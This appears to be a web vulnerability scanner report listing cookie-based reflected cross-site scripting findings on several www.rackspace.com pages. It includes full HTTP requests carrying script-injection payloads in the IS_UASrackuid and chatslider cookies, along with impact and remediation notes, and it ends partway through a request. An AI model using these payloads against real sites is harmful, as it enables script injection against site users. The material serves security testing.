GET /sitemap404.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Abb8e9"><script>alert(1)</script>9b077acfc1d; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4e65"><script>alert(1)</script>35cb5f5e2ee was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/expertise/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8e4e65"><script>alert(1)</script>35cb5f5e2ee; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74c20"%3balert(1)//c41ccc278a4 was submitted in the IS_UASrackuid cookie. This input was echoed as 74c20";alert(1)//c41ccc278a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/expertise/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f874c20"%3balert(1)//c41ccc278a4; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57436"%3balert(1)//6d21507bc95 was submitted in the chatslider cookie. This input was echoed as 57436";alert(1)//6d21507bc95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/expertise/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D57436"%3balert(1)//6d21507bc95; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55da8"><script>alert(1)</script>9c0a962351 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/expertise/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D55da8"><script>alert(1)</script>9c0a962351; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9028"%3balert(1)//47253253fe4 was submitted in the IS_UASrackuid cookie. This input was echoed as a9028";alert(1)//47253253fe4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a9028"%3balert(1)//47253253fe4; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a211a"><script>alert(1)</script>2f4041feedb was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a211a"><script>alert(1)</script>2f4041feedb; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abf23"%3balert(1)//89a4027ea34 was submitted in the chatslider cookie. This input was echoed as abf23";alert(1)//89a4027ea34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dabf23"%3balert(1)//89a4027ea34; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0735"><script>alert(1)</script>a5ff1592e93 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dc0735"><script>alert(1)</script>a5ff1592e93; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81f8c"%3balert(1)//f64380ecae1 was submitted in the IS_UASrackuid cookie. This input was echoed as 81f8c";alert(1)//f64380ecae1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/network/bandwidthbilling.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f881f8c"%3balert(1)//f64380ecae1; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d66c5"><script>alert(1)</script>448a15f3ee5 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/network/bandwidthbilling.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8d66c5"><script>alert(1)</script>448a15f3ee5; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6814"><script>alert(1)</script>5315014625 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/network/bandwidthbilling.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dd6814"><script>alert(1)</script>5315014625; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8e5e"%3balert(1)//7d155523240 was submitted in the chatslider cookie. This input was echoed as a8e5e";alert(1)//7d155523240 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/network/bandwidthbilling.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Da8e5e"%3balert(1)//7d155523240; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e398a"><script>alert(1)</script>fa4079450c0 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/network/datacenters.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8e398a"><script>alert(1)</script>fa4079450c0; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; 